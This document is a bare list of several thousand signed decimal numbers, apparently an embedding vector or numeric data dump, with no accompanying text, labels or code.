-0.006822363939136267, 0.016202645376324654, 0.02032831870019436, -0.024844055995345116, 0.0048082852736115456, 0.02770952507853508, -0.030544986948370934, 0.009639074094593525, 0.015144973061978817, -0.009211503900587559, -0.010554223321378231, 0.00893395859748125, 0.03459564968943596, -0.004943307023495436, 0.030544986948370934, 0.004376964643597603, -0.019773228093981743, -0.02205360122025013, -0.01385476253926754, 0.0003851410001516342, -0.05394880846142769, 0.0390663780272007, -0.013877266086637974, 0.03261532634496689, -0.0066648381762206554, 0.03657597303390503, -0.01122183259576559, 0.0036643482744693756, 0.004376964643597603, -0.002169729210436344, -0.00936902966350317, -0.027049416676163673, -0.019878245890140533, -0.008941460400819778, -0.019323155283927917, -0.022653698921203613, 0.009324022568762302, 0.03040996566414833, 0.020388329401612282, 0.05325869470834732, 0.005044573452323675, 0.0001946802221937105, 0.0014758659526705742, 0.0042306906543672085, 0.0049133021384477615, -0.014169814065098763, 0.024979079142212868, 0.02508409507572651, 0.008716423064470291, -0.017927927896380424, 0.01953318901360035, -0.00834136176854372, -0.009091484360396862, -0.07087156921625137, 0.006518564186990261, -0.023553846403956413, 0.010966790840029716, -0.015129970386624336, 0.028879715129733086, 0.016337668523192406, -0.005239605437964201, 0.02346383035182953, 0.002931103575974703, -0.031055070459842682, -0.011611895635724068, -0.006552319973707199, 0.004710769280791283, -0.017132798209786415, -0.025429151952266693, 0.002976110903546214, 0.03189520910382271, -0.011094311252236366, 0.028624674305319786, -0.025789210572838783, -0.009076481685042381, -0.014079798944294453, -0.003863130696117878, 0.008093821816146374, -0.030965056270360947, -0.02140849642455578, -0.020208299160003662, 0.02002827078104019, -0.012444531545042992, -0.015422518365085125, -0.012624561786651611, -0.017207808792591095, -0.004361962433904409, -0.031355120241642, -0.0002658246667124331, -0.013472199440002441, 0.007276188116520643, 0.0006033797981217504, 0.02115345373749733, 0.03303539380431175, -0.01107930950820446, 0.029494816437363625, 0.019443174824118614, 0.0076249949634075165, -0.014544875361025333, -0.05454890802502632, 0.023523841053247452, -0.00391939003020525, -0.01819797046482563, 0.0018312365282326937, 0.006604828406125307, 0.0539788119494915, -0.022248633205890656, -0.011049304157495499, -0.019428173080086708, -0.02068837732076645, -0.017057785764336586, -0.014049794524908066, -0.01920313574373722, -0.026959402486681938, 0.008273851126432419, 0.013682234100997448, -0.004016906023025513, -0.005074578803032637, -0.019158128648996353, -0.021663537248969078, 0.01599261164665222, 0.003366174641996622, 0.015437521040439606, 0.0049470579251646996, -0.022143615409731865, -0.009316520765423775, 0.013119642622768879, 0.0063010286539793015, 0.0178679171949625, -0.014064796268939972, 0.004384465981274843, 0.019188132137060165, 0.033095404505729675, -0.012512043118476868, 0.010891778394579887, 0.017102792859077454, -0.026869386434555054, -0.009879113174974918, -0.012512043118476868, -0.02968984842300415, -0.009121489711105824, 0.019488181918859482, -0.014222322031855583, 0.013697236776351929, -0.035975873470306396, 0.030154922977089882, -0.020628368481993675, 0.0231337770819664, 0.0007815338321961462, 0.0018040445866063237, 0.012399524450302124, 0.012106976471841335, -0.057849444448947906, 0.016022616997361183, -0.01837800070643425, -0.02947981283068657, -0.020598363131284714, 0.02125847153365612, 0.022188622504472733, 0.018242979422211647, -0.03447562828660011, 0.023688867688179016, -0.008461381308734417, -0.03474567458033562, -0.013329676352441311, 0.011379358358681202, -0.008296354673802853, -0.03780617192387581, 0.006323532667011023, -0.01722281239926815, 0.005985977593809366, -0.040416598320007324, 0.025354139506816864, 0.024378981441259384, 0.006619831081479788, 0.023943910375237465, 0.015249989926815033, 0.012196991592645645, -0.001997201004996896, 0.0000864984976942651, -0.006646085064858198, 0.030995061621069908, -0.011049304157495499, -0.001235826755873859, -0.016157638281583786, -0.00727993855252862, -0.019263144582509995, -0.0115668885409832, 0.03372550755739212, 0.005847204942256212, -0.03153514862060547, 0.0035143238492310047, 0.011446869000792503, 0.014582380652427673, -0.015129970386624336, 0.03228527307510376, -0.008258848451077938, -0.008258848451077938, 0.029194766655564308, -0.01513747125864029, 0.019158128648996353, -0.006203513126820326, -0.03102506510913372, 0.028999734669923782, 0.05022820085287094, 0.030184928327798843, -0.03462565317749977, -0.029104752466082573, 0.00798130314797163, -0.028054580092430115, -0.0031448884401470423, 0.02277371846139431, 0.0023403821978718042, -0.007816276513040066, 0.01801794208586216, 0.014544875361025333, 0.0059184664860367775, -0.0026854383759200573, -0.009376531466841698, 0.0187680646777153, 0.003362423973158002, -0.035585809499025345, 0.013614723458886147, 0.005299615208059549, -0.020673375576734543, 0.006867371499538422, 0.05775943025946617, -0.006481058429926634, -0.0031636415515094995, -0.0018312365282326937, -0.015407515689730644, -0.00012201211211504415, -0.0082888538017869, 0.009286516346037388, 0.032165251672267914, -0.0048195370472967625, 0.02014829032123089, -0.025309132412075996, 0.0339355394244194, -0.014109804295003414, 0.021708544343709946, -0.013832258991897106, 0.0006647960399277508, -0.025894228368997574, 0.006244769785553217, 0.011026800610125065, -0.0009362465934827924, -0.014237324707210064, 0.009886614046990871, 0.005070827901363373, -0.01340468879789114, -0.013524708338081837, 0.0147774126380682, -0.0012677069753408432, 0.012977118603885174, 0.02086840756237507, 0.017612876370549202, 0.0009385907324030995, 0.004905800800770521, -0.0033830523025244474, 0.027364468201994896, -0.019938254728913307, 0.0012217620387673378, -0.01282709464430809, 0.02554917149245739, -0.008221342228353024, -0.013232160359621048, 0.01845301315188408, -0.021378491073846817, 0.012624561786651611, -0.029704850167036057, -0.024964075535535812, -0.017612876370549202, -0.010929284617304802, 0.005997229367494583, -0.012099475599825382, -0.02079339511692524, -0.013164649717509747, -0.0304549727588892, 0.018573032692074776, -0.012309510260820389, 0.004995815921574831, -0.0003190364805050194, 0.09109487384557724, -0.004868295043706894, 0.006946134380996227, -0.021528515964746475, -0.02104843594133854, 0.013824757188558578, 0.009624071419239044, 0.00012447344488464296, 0.0037318593822419643, -0.018933091312646866, 0.0007266811444424093, 0.007632496301084757, -0.0011514379875734448, 0.015309999696910381, 0.017747897654771805, 0.022248633205890656, -0.013817256316542625, 0.005517150741070509, 0.017357833683490753, 0.010636736638844013, 0.009481548331677914, 0.015362508594989777, -0.0025504163932055235, -0.0036380940582603216, 0.012572052888572216, 0.011371856555342674, -0.015392513014376163, -0.015482528135180473, -0.031505145132541656, -0.0012639564229175448, 0.016097627580165863, 0.006934882141649723, -0.0037074803840368986, -0.009999132715165615, -0.0058322022669017315, -0.0015958856092765927, 0.02280372381210327, 0.028819706290960312, -0.00023136590607464314, -0.0336654968559742, -0.013967280276119709, -0.006379791535437107, -0.01906811259686947, 0.024303968995809555, -0.005022069904953241, 0.007778770290315151, 0.023973913863301277, -0.011026800610125065, -0.01143936812877655, 0.012467036023736, -0.02406392991542816, -0.007793772500008345, -0.004159429110586643, -0.007557483855634928, 0.02328380197286606, -0.008393870666623116, -0.015062459744513035, -0.0034880696330219507, -0.006304779555648565, -0.0005522776627913117, 0.0015536912251263857, 0.007152417674660683, -0.02472403645515442, -0.00019913408323191106, 0.016097627580165863, -0.014477363787591457, -0.022023595869541168, -0.0012302008690312505, -0.023628858849406242, 0.011011797934770584, 0.007516227196902037, 0.0047745294868946075, 0.004463228862732649, -0.0041256737895309925, -0.001624952768906951, -0.006829865276813507, -0.0303349532186985, 0.0242889653891325, -0.03825624659657478, -0.02374887838959694, -0.0024772793985903263, 0.008678916841745377, 0.008888951502740383, 0.009376531466841698, 0.009534056298434734, 0.04686765372753143, -0.013322175480425358, -0.021033434197306633, -0.01639767736196518, -0.007988804019987583, -0.020883409306406975, -0.000030415121727855876, 0.009901616722345352, -0.00945904478430748, 0.010029137134552002, 0.03834626078605652, -0.00045382409007288516, -0.011866937391459942, -0.016097627580165863, -0.008191337808966637, 0.02176855504512787, -0.0007393394480459392, 0.004208187106996775, -0.011341852135956287, -0.022023595869541168, -0.0018940592417493463, 0.000597753853071481, -0.0009395283996127546, -0.01632266491651535, -0.002376012969762087, -0.0026929397135972977, -0.00983410608023405, 0.015317501500248909, 0.0023272549733519554, -0.0009704709518700838, -0.0021809812169522047, -0.016157638281583786, -0.007568735629320145, -0.00392689136788249, -0.037746164947748184, -0.018978098407387733, 0.003278035204857588, 0.0034543140791356564, -0.03276535123586655, 0.006987391039729118, -0.0010192289482802153, 0.025129104033112526, -0.02691439539194107, 0.008513890206813812, -0.0014205444604158401, 0.020118284970521927, -0.006503561977297068, 0.02781454101204872, 0.00003917631693184376, 0.009068980813026428, -0.013757246546447277, 0.021528515964746475, -0.0002594954858068377, -0.0013389686355367303, 0.01650269515812397, -0.015662556514143944, 0.012024463154375553, 0.001237702090293169, 0.023403821513056755, 0.007437464315444231, -0.009736590087413788, -0.015272493474185467, 0.01106430683284998, -0.00038818837492726743, 0.028744693845510483, 0.004485732410103083, -0.03711606189608574, 0.014544875361025333, -0.0003921734169125557, 0.004984563682228327, -0.00922650657594204, 0.020403331145644188, -0.022653698921203613, -0.015827585011720657, 0.019188132137060165, -0.005895962473005056, 0.012834595516324043, 0.01719280704855919, -0.03663598373532295, -0.006229767110198736, 0.03714606538414955, -0.004148177336901426, -0.0031223848927766085, -0.01855803094804287, 0.0074337138794362545, 0.0027323211543262005, -0.005719684064388275, -0.015212483704090118, -0.013442195020616055, 0.0025541670620441437, 0.03228527307510376, -0.0009006158215925097, 0.004373214207589626, 0.014087299816310406, -0.02140849642455578, 0.009474046528339386, -0.008761430159211159, 0.026404311880469322, 0.005359624978154898, -0.01030668243765831, -0.004748275503516197, 0.004523238632827997, -0.004234441556036472, -0.028114590793848038, 0.016367672011256218, 0.02010328322649002, 0.024168945848941803, -0.013397187925875187, -0.020733386278152466, 0.004639507737010717, -0.02932978980243206, 0.010651739314198494, -0.019623203203082085, 0.002961108461022377, -0.033815521746873856, -0.01686275377869606, -0.01039669755846262, -0.0013511581346392632, 0.008746428415179253, -0.0010267301695421338, -0.0416468009352684, -0.0152274863794446, 0.010786761529743671, -0.008903954178094864, 0.009436541236937046, 0.001336155692115426, -0.02968984842300415, -0.00015400952543132007, -0.0032105243299156427, 0.034715667366981506, 0.0005339934141375124, -0.0013192779151722789, -0.02446899563074112, -0.005157092120498419, -0.0018424883019179106, 0.015647554770112038, -0.0038856344763189554, -0.007223679684102535, -0.008003806695342064, -0.02652433142066002, -0.018933091312646866, 0.01884307712316513, -0.032045233994722366, -0.004148177336901426, 0.002113470109179616, -0.014537373557686806, -0.018963096663355827, 0.013592218980193138, 0.008101322688162327, -0.011544384993612766, -0.013494702987372875, -0.005622168071568012, -0.016922762617468834, -0.014379847794771194, 0.012054468505084515, 0.005232104100286961, -0.01318715326488018, -0.02190357632935047, -0.003613715060055256, 0.004500735085457563, -0.0003532608097884804, 0.007718760520219803, 0.025099098682403564, -0.0006830802885815501, 0.010531719774007797, 0.00288797146640718, 0.008453880436718464, 0.00821384135633707, 0.0024116437416523695, 0.0012498915893957019, 0.0026629348285496235, 0.006668589077889919, -0.03690602630376816, -0.017462851479649544, -0.006691092625260353, 0.040776658803224564, -0.0017712267581373453, -0.0026048002764582634, 0.027109427377581596, -0.026059255003929138, 0.01963820680975914, -0.026254286989569664, -0.015392513014376163, -0.011364355683326721, 0.012099475599825382, 0.011739416979253292, -0.002182856434956193, -0.0009442166774533689, -0.005187097005546093, -0.006207263562828302, -0.0007135540363378823, 0.009624071419239044, -0.010959289036691189, -0.02043333649635315, 0.013584718108177185, 0.0019109370186924934, 0.047647781670093536, 0.007831278257071972, -0.029269779101014137, -0.009571562521159649, 0.0017224687617272139, -0.04212687909603119, 0.02010328322649002, -0.02053835429251194, -0.006972388364374638, -0.018873082473874092, -0.02035832405090332, 0.004478231072425842, -0.016022616997361183, 0.018588034436106682, 0.00047984396223910153, -0.004650759510695934, 0.03231527656316757, 0.039156392216682434, 0.013824757188558578, -0.004890798591077328, 0.014589882455766201, 0.017597872763872147, -0.022068602964282036, 0.013344679027795792, -0.003780617378652096, -0.021753551438450813, -0.004418221302330494, -0.002799832262098789, -0.010246672667562962, -0.009886614046990871, 0.002977986354380846, -0.03420558571815491, 0.0024679030757397413, -0.008753929287195206, -0.0027360718231648207, -0.031505145132541656, 0.006158505566418171, -0.028339628130197525, 0.010029137134552002, -0.00028879716410301626, -0.01732783019542694, -0.026359304785728455, 0.00009036631672643125, -0.022353649139404297, -0.005753439385443926, -0.005727184936404228, 0.005007067695260048, -0.017312826588749886, -0.021213464438915253, 0.03732609376311302, 0.001542439335025847, 0.004902050364762545, -0.013359681703150272, -0.009083983488380909, -0.0038181233685463667, 0.02652433142066002, -0.008423875086009502, -0.008843944407999516, 0.007696256507188082, -0.03261532634496689, 0.016637716442346573, 0.001794668030925095, 0.004425722640007734, 0.010081646032631397, -0.005637170281261206, -0.001682149711996317, -0.0034411868546158075, -0.00625977199524641, -0.031055070459842682, -0.02626928873360157, -0.00727993855252862, -0.013277167454361916, 0.004894549027085304, 0.0009231194853782654, 0.014889931306242943, 0.007234931457787752, 0.010119152255356312, 0.021123448386788368, -0.02032831870019436, -0.016517696902155876, -0.0044557275250554085, 0.006128500681370497, 0.007043649908155203, 0.017357833683490753, -0.02359885349869728, -0.0051495907828211784, -0.0026929397135972977, 0.0073887063190341, 0.03132511302828789, 0.006957386154681444, -0.00634228577837348, 0.015114967711269855, -0.03279535472393036, 0.0015743195544928312, 0.0021753550972789526, 0.024799048900604248, -0.015737568959593773, -0.006901126820594072, 0.035765841603279114, -0.02691439539194107, 0.009346526116132736, -0.03348546847701073, -0.003771240822970867, -0.00405441178008914, -0.004534490406513214, -0.014019789174199104, -0.025159107521176338, 0.006102246232330799, -0.023988917469978333, 0.009324022568762302, -0.0022728710900992155, 0.012617059983313084, 0.03228527307510376, -0.0046357568353414536, 0.0036999790463596582, -0.026254286989569664, 0.023688867688179016, -0.006267273332923651, -0.011739416979253292, 0.001639017602428794, -0.0152274863794446, -0.016982773318886757, 0.019323155283927917, 0.009609068743884563, -0.00703614903613925, -0.025489162653684616, -0.030935050919651985, 0.030650004744529724, -0.020388329401612282, 0.010981793515384197, 0.0023535091895610094, -0.03156515583395958, -0.024739040061831474, -0.014154811389744282, -0.0020965924486517906, 0.008843944407999516, 0.027739528566598892, 0.029284780845046043, -0.006972388364374638, -0.0019821985624730587, -0.010186662897467613, -0.01848301850259304, -0.011296844109892845, -0.03055999055504799, -0.019038109108805656, -0.027799539268016815, -0.015452522784471512, -0.008626408874988556, 0.007152417674660683, -0.002141599776223302, 0.002694814931601286, 0.005940970033407211, -0.0009676580084487796, 0.00799630582332611, -0.01639767736196518, -0.00024566511274315417, 0.0007121475064195693, -0.011731915175914764, -0.001154250930994749, 0.019053110852837563, -0.011086810380220413, -0.004425722640007734, 0.0005714995786547661, -0.008513890206813812, 0.009549058973789215, -0.032345280051231384, 0.010801763273775578, -0.024273963645100594, 0.00026441816589795053, 0.017852915450930595, -0.018498020246624947, 0.011004297062754631, 0.007272437680512667, -0.0012151984265074134, -0.007883787155151367, -0.010569225996732712, 0.017777903005480766, 0.009189000353217125, -0.0030923800077289343, 0.01834799535572529, -0.02125847153365612, 0.022728711366653442, -0.003737485269084573, 0.014454860240221024, -0.000989224063232541, 0.018543027341365814, 0.008716423064470291, -0.019788231700658798, -0.02046334184706211, 0.013884766958653927, 0.0015386887826025486, 0.03378551825881004, 0.0018143587512895465, 0.003182394662871957, -0.004632006399333477, -0.022068602964282036, -0.005029571242630482, 0.019548192620277405, -0.0005846266867592931, 0.015482528135180473, 0.0431770496070385, -0.0023535091895610094, -0.0034036808647215366, 0.000500237918458879, 0.00888145063072443, 0.008251347579061985, -0.012106976471841335, 0.01855803094804287, -0.01647268980741501, -0.02118345908820629, -0.026719363406300545, -0.0008415436604991555, -0.016487691551446915, 0.020883409306406975, 0.01444735936820507, 0.013224659487605095, 0.025414150208234787, 0.01435734424740076, -0.019488181918859482, -0.0002740291238296777, -0.001278958865441382, -0.011289343237876892, 0.0018537401920184493, 0.0015761948889121413, -0.005678427405655384, -0.003960646688938141, -0.004069414455443621, 0.020733386278152466, -0.0014571129577234387, 0.006507312413305044, 0.006672339513897896, -0.02331380732357502, -0.01273707952350378, -0.009526555426418781, 0.00972908828407526, 0.02637430652976036, 0.0025672942865639925, -0.004590749740600586, -0.008948961272835732, -0.007343699224293232, -0.00531461788341403, 0.026644350960850716, -0.009886614046990871, -0.021633531898260117, 0.015872592106461525, 0.01678774133324623, -0.002822335809469223, 0.005112084560096264, -0.015144973061978817, 0.0008148205233737826, 0.004433223977684975, -0.00543088698759675, -0.025339137762784958, 0.01008914690464735, -0.006923630367964506, 0.02706441842019558, -0.016532698646187782, -0.002150976099073887, -0.008401371538639069, 0.004519487731158733, -0.007598740514367819, -0.0037449863739311695, 0.007358701433986425, -0.00311300833709538, -0.005442138761281967, 0.01912812329828739, -0.020088279619812965, -0.029899882152676582, 0.014454860240221024, 0.018978098407387733, 0.013607221655547619, -0.006908628158271313, -0.017462851479649544, -0.0038706320337951183, -0.0035105731803923845, 0.005802197381854057, 0.0023291301913559437, -0.0003073158150073141, -0.009796599857509136, -0.013112140819430351, 0.012369520030915737, 0.014229823835194111, 0.00543088698759675, 0.006398544646799564, -0.0012723952531814575, 0.0024285216350108385, -0.02035832405090332, -0.010209167376160622, -0.023688867688179016, 0.0016596459317952394, 0.007801273837685585, -0.020733386278152466, 0.015272493474185467, 0.007414960768073797, -0.004354461096227169, 0.01061423309147358, 0.0018574907444417477, -0.003501196624711156, -0.0029967392329126596, 0.009429039433598518, 0.018933091312646866, -0.005123336333781481, -0.031115081161260605, -0.010141655802726746, -0.014597383327782154, 0.010284178890287876, 0.0012180113699287176, -0.011431866325438023, -0.0024378979578614235, 0.014327339828014374, 0.012512043118476868, -0.03081503137946129, 0.019728220999240875, -0.0018012316431850195, -0.014604885131120682, -0.023448828607797623, -0.008281351998448372, -0.002040333114564419, 0.022683704271912575, -0.0038593802601099014, 0.0017412217566743493, -0.009504051879048347, -0.009068980813026428, -0.00031505143851973116, -0.0020797145552933216, 0.005265859887003899, -0.024919068440794945, 0.008858946152031422, 0.0012480162549763918, 0.01719280704855919, -0.002057211007922888, -0.0015893219970166683, 0.010021636262536049, 0.0073999580927193165, -0.010029137134552002, -0.030004899948835373, -0.013052131049335003, -0.007309943437576294, -0.014364845119416714, -0.002977986354380846, -0.005022069904953241, 0.004493233747780323, 0.002852340694516897, 0.008821439929306507, 0.006424799095839262, -0.0006746414001099765, -0.008003806695342064, -0.013224659487605095, 0.03159515932202339, 0.011319348588585854, -0.019878245890140533, -0.006064740475267172, -0.01647268980741501, -0.00625977199524641, 0.0147774126380682, -0.006796109490096569, 0.01732783019542694, -0.023718873038887978, -0.0020084530115127563, -0.011761920526623726, 0.005438387859612703, -0.01237702090293169, -0.0303349532186985, -0.023358814418315887, 0.0050970823504030704, 0.015197481028735638, 0.004290700424462557, 0.00039592402754351497, 0.03171517699956894, -0.010216668248176575, 0.004654509946703911, -0.023538842797279358, 0.0020422085653990507, 0.004489482846111059, -0.008146329782903194, -0.009571562521159649, -0.010246672667562962, 0.000527429860085249, 0.005498397629708052, 0.00403565913438797, 0.011041803285479546, -0.012639563530683517, 0.00834136176854372, 0.009849107824265957, -0.02511410042643547, -0.012399524450302124, 0.007291190326213837, -0.004748275503516197, 0.01827298291027546, 0.02395891211926937, -0.004129424225538969, -0.025324134156107903, -0.0006235393229871988, -0.000998600502498448, -0.019908251240849495, 0.008468883112072945, 0.005250857211649418, -0.009106487035751343, 0.008873948827385902, -0.01989324763417244, 0.001266769366338849, -0.004020656459033489, 0.003908138256520033, 0.009489049203693867, -0.006323532667011023, -0.007891288958489895, -0.00589971337467432, -0.005475894082337618, -0.023358814418315887, 0.02274371311068535, 0.01074175350368023, 0.017417844384908676, -0.0028842210303992033, -0.0016324541065841913, -0.04341708868741989, -0.015212483704090118, 0.009324022568762302, -0.03408556431531906, 0.018948093056678772, 0.00844637956470251, -0.005232104100286961, 0.00579094560816884, 0.0022016095463186502, -0.019833238795399666, 0.008191337808966637, -0.009631572291254997, -0.0007037086761556566, 0.0013108390849083662, -0.0023835140746086836, -0.001361472299322486, -0.012076972052454948, 0.014709901995956898, 0.012302008457481861, -0.024483997374773026, 0.019548192620277405, -0.0010539221111685038, 0.02472403645515442, 0.026584340259432793, 0.011626898311078548, -0.02968984842300415, 0.010006633587181568, 0.011004297062754631, -0.014814918860793114, -0.004343209322541952, 0.01516747660934925, 0.03318541869521141, -0.012572052888572216, -0.020373325794935226, -0.012557050213217735, 0.024694032967090607, 0.015219985507428646, 0.01376474741846323, -0.020088279619812965, -0.000018342838302487507, -0.0005583724123425782, -0.00011538993567228317, -0.02878970094025135, -0.003934392239898443, -0.010779259726405144, 0.023373816162347794, 0.023898901417851448, -0.00692738126963377, -0.01119182724505663, 0.004309453535825014, -0.00300048990175128, -0.013104639947414398, 0.01170941162854433, -0.008033812046051025, 0.0014974320074543357, -0.00796630047261715, 0.013472199440002441, -0.011229333467781544, -0.003934392239898443, 0.024423988536000252, -0.008716423064470291, -0.005487145856022835, 0.012429529801011086, -0.000555559468921274, 0.009976629167795181, 0.010479210875928402, 0.037566132843494415, 0.023523841053247452, 0.01758287101984024, 0.01693776622414589, 0.008986467495560646, 0.0024622769560664892, 0.004770779050886631, -0.025564173236489296, -0.023433826863765717, -0.014027290046215057, 0.01383975986391306, 0.015032454393804073, -0.010936785489320755, 0.015062459744513035, 0.008693919517099857, -0.006229767110198736, -0.01776290126144886, 0.001417731516994536, -0.02370387129485607, -0.0007332446984946728, 0.010381694883108139, -0.012864600867033005, 0.0046807643957436085, 0.03600588068366051, -0.019593199715018272, 0.0006722972611896694, -0.0004074102616868913, 0.0008537331596016884, 0.011169323697686195, 0.00011826149420812726, -0.022863732650876045, 0.017897922545671463, 0.0005513399955816567, -0.026149269193410873, -0.02208360657095909, 0.006747351493686438, 0.0007496536709368229, -0.009856609627604485, -0.01122183259576559, -0.005393380764871836, -0.041706811636686325, -0.004692016169428825, -0.0023385067470371723, 0.0035086979623883963, 0.020673375576734543, 0.0014693024568259716, -0.0007970051374286413, 0.0046807643957436085, 0.015377511270344257, -0.019833238795399666, 0.005573410075157881, -0.012121979147195816, 0.013239662162959576, 0.0033755511976778507, 0.004335707984864712, -0.003435560967773199, -0.0051383390091359615, 0.017417844384908676, -0.021648535504937172, -0.007688755635172129, -0.01296961773186922, 0.02673436515033245, 0.006075992248952389, 0.0005438387743197381, -0.01068174373358488, -0.013277167454361916, -0.02503908798098564, 0.02140849642455578, -0.020673375576734543, -0.026284292340278625, -0.0065598213113844395, 0.0025091597344726324, -0.002571044722571969, -0.0251891128718853, -0.012842097319662571, -0.005828451830893755, -0.0010464208899065852, -0.011731915175914764, -0.008536393754184246, -0.002839213702827692, 0.001849051914177835, 0.00864891242235899, 0.004009404685348272, -0.026824379339814186, -0.016082625836133957, 0.000570093106944114, -0.001166440430097282, -0.0036662237253040075, -0.018107956275343895, 0.010066643357276917, -0.009414036758244038, -0.012181988917291164, 0.00530711654573679, 0.020478343591094017, -0.003863130696117878, 0.006338534876704216, -0.034865692257881165, -0.02580421417951584, -0.014019789174199104, 0.02230864204466343, 0.015437521040439606, 0.011469372548162937, -0.017177805304527283, -0.0034561892971396446, -0.02154351770877838, -0.007531229872256517, -0.0002531663340050727, -0.028144596144557, -0.001460863510146737, 0.017702890560030937, -0.005670926067978144, -0.007497474085539579, 0.03240529075264931, 0.004354461096227169, 0.003446812741458416, -0.01588759385049343, 0.00047632778296247125, -0.03372550755739212, 0.005393380764871836, 0.017267819494009018, -0.002098467666655779, -0.016007613390684128, 0.02400391921401024, -0.01563255302608013, 0.0069836401380598545, 0.0018649919657036662, 0.004470730200409889, 0.009901616722345352, -0.005355874542146921, -0.024874061346054077, 0.008333860896527767, -0.030905045568943024, 0.02331380732357502, 0.015377511270344257, -0.0023310056421905756, 0.011296844109892845, -0.006649835966527462, -0.0024585265200585127, 0.011086810380220413, -0.024228956550359726, 0.004609502851963043, -0.02100342884659767, 0.01443235669285059, 0.005025820806622505, 0.007309943437576294, -0.013712238520383835, -0.009616570547223091, 0.011716913431882858, -0.0019062487408518791, 0.0016174515476450324, 0.010074145160615444, 0.026509327813982964, 0.004523238632827997, 0.008423875086009502, 0.0018743685213848948, -0.012136981822550297, -0.004767028149217367, 0.0015921349404379725, 0.0035274510737508535, 0.014417354017496109, 0.0046807643957436085, 0.00023077987134456635, 0.00497331190854311, 0.0026816879399120808, -0.009931622073054314, 0.015557540580630302, -0.0010792387183755636, -0.009421538561582565, -0.008146329782903194, 0.016007613390684128, 0.00007085141260176897, 0.007549982983618975, 0.009556560777127743, -0.03999653086066246, 0.012106976471841335, 0.010606732219457626, -0.010951788164675236, -0.0012292632600292563, -0.007748765405267477, 0.0025054090656340122, 0.0028167099226266146, -0.004241942428052425, -0.0044107199646532536, -0.020223302766680717, -0.014627388678491116, 0.007748765405267477, -0.012497040443122387, 0.02061336487531662, 0.007921293377876282, -0.008371367119252682, -0.014402351342141628, -0.025309132412075996, -0.014409853145480156, -0.016877755522727966, 0.010891778394579887, -0.012962116859853268, 0.027724526822566986, 0.014994948171079159, -0.030995061621069908, -0.01614263653755188, 0.0018921839073300362, 0.005003316793590784, 0.012624561786651611, 0.01956319436430931, 0.0068786232732236385, -0.042576953768730164, 0.0030061157885938883, -0.00012541109754238278, 0.011514379642903805, 0.011199329048395157, -0.0004983626422472298, 0.015647554770112038, -0.025024086236953735, 0.018573032692074776, 0.014042292721569538, 0.0005930655752308667, -0.006822363939136267, -0.02446899563074112, 0.006466055754572153, -0.02709442377090454, 0.002556042280048132, -0.023268800228834152, -0.0033342945389449596, -0.011289343237876892, -0.012136981822550297, -0.003559331176802516, 0.015977608039975166, 0.026464320719242096, -0.015527535229921341, -0.01722281239926815, -0.01398228295147419, 0.025849221274256706, 0.0034543140791356564, 0.013704737648367882, -0.02316378243267536, 0.024949073791503906, -0.005389629863202572, -0.007534980308264494, -0.025639185681939125, 0.012384521774947643, -0.021888574585318565, 0.012407026253640652, 0.008708922192454338, -0.008611406199634075, 0.012467036023736, 0.01578257791697979, 0.007137415464967489, -0.006271023768931627, -0.013464698567986488, -0.001807795139029622, 0.018603038042783737, -0.01155188586562872, 0.01714779995381832, -0.0009704709518700838, 0.0034018054138869047, -0.021828563883900642, 0.010336687788367271, 0.02850465476512909, -0.004354461096227169, -0.0005339934141375124, 0.01996826007962227, 0.0026329299435019493, 0.005888461600989103, -0.013052131049335003, -0.0032892869785428047, -0.01675773598253727, -0.03945644199848175, 0.015797579661011696, -0.003975649364292622, 0.004110671114176512, 0.009534056298434734, 0.002240990987047553, 0.019113121554255486, 0.018933091312646866, 0.01812295988202095, -0.0065598213113844395, 0.0004603876732289791, -0.0016230775509029627, 0.013299671933054924, 0.004069414455443621, 0.008063816465437412, -0.03870632126927376, 0.02154351770877838, 0.00267043593339622, 0.005037072580307722, -0.014439857564866543, 0.004065664019435644, -0.0041256737895309925, 0.011214330792427063, -0.011506878770887852, -0.012894605286419392, -0.024258961901068687, -0.005753439385443926, 0.004890798591077328, 0.01513747125864029, 0.009234007447957993, 0.00913649145513773, 0.003354922868311405, 0.005303366109728813, -0.01747785322368145, -0.024378981441259384, 0.009158995933830738, 0.00015928382345009595, 0.014994948171079159, -0.0005203974433243275, -0.01714779995381832, 0.023898901417851448, -0.00037154502933844924, 0.014252327382564545, 0.015144973061978817, 0.013734742999076843, -0.013014624826610088, 0.014912434853613377, -0.010366693139076233, -0.02785954810678959, -0.01466489490121603, -0.023148780688643456, 0.003501196624711156, -0.01629265956580639, -0.01426732912659645, -0.014034791849553585, 0.03657597303390503, 0.022353649139404297, 0.0025354139506816864, -0.008813939057290554, -0.005209600552916527, 0.01107930950820446, 0.02068837732076645, 0.020733386278152466, -0.009234007447957993, -0.007103659678250551, -0.009128990583121777, 0.006409796420484781, -0.0014402351807802916, -0.019758226349949837, 0.023403821513056755, 0.0078387800604105, 0.011446869000792503, -0.041346751153469086, -0.01722281239926815, 0.004827038384974003, 0.019698215648531914, 0.032555315643548965, -0.022428661584854126, 0.011101813055574894, -0.029899882152676582, 0.007816276513040066, -0.0019390665693208575, 0.0028598420321941376, -0.009924120269715786, -0.0028129592537879944, -0.012572052888572216, 0.008191337808966637, -0.03426559641957283, 0.00659357663244009, 0.0035068225115537643, -0.006098495796322823, -0.01053922064602375, -0.02968984842300415, 0.0010876775486394763, -0.004118172451853752, 0.016622714698314667, -0.013509705662727356, 0.006758603733032942, -0.014237324707210064, 0.007681254297494888, 0.013359681703150272, 0.019728220999240875, -0.015647554770112038, 0.00810882356017828, -0.028369631618261337, -0.013322175480425358, 0.012497040443122387, 0.012587055563926697, -0.009894115850329399, -0.005250857211649418, -0.008371367119252682, -0.0017468477599322796, 0.009579064324498177, -0.007846280932426453, 0.008236344903707504, 0.0021190959960222244, 0.0009957875590771437, 0.000888895126990974, 0.019683213904500008, -0.021738549694418907, -0.0047220210544764996, 0.031475137919187546, -0.00798130314797163, -0.028369631618261337, 0.005284612998366356, 0.0060122315771877766, 0.0024078930728137493, 0.007212427444756031, 0.023253796622157097, -0.021453503519296646, 0.01776290126144886, 0.0339355394244194, 0.003911888692528009, 0.007527478970587254, 0.012909607961773872, -0.005622168071568012, 0.007167420350015163, 0.003084878670051694, -0.0002169494837289676, -0.0017580995336174965, 0.022398658096790314, -0.013014624826610088, -0.000017742155250743963, -0.004564495291560888, 0.0018134211422875524, 0.005157092120498419, 0.026944398880004883, 0.005509649403393269, 0.0010726751061156392, -0.014462361112236977, -0.006949884817004204, 0.0022991253063082695, -0.008993968367576599, -0.010096648707985878, -0.012474536895751953, 0.0008706108783371747, -0.013329676352441311, -0.0038049963768571615, -0.016202645376324654, 0.008168834261596203, 0.0027304459363222122, 0.017882920801639557, 0.0047857812605798244, -0.013607221655547619, -0.01729782484471798, 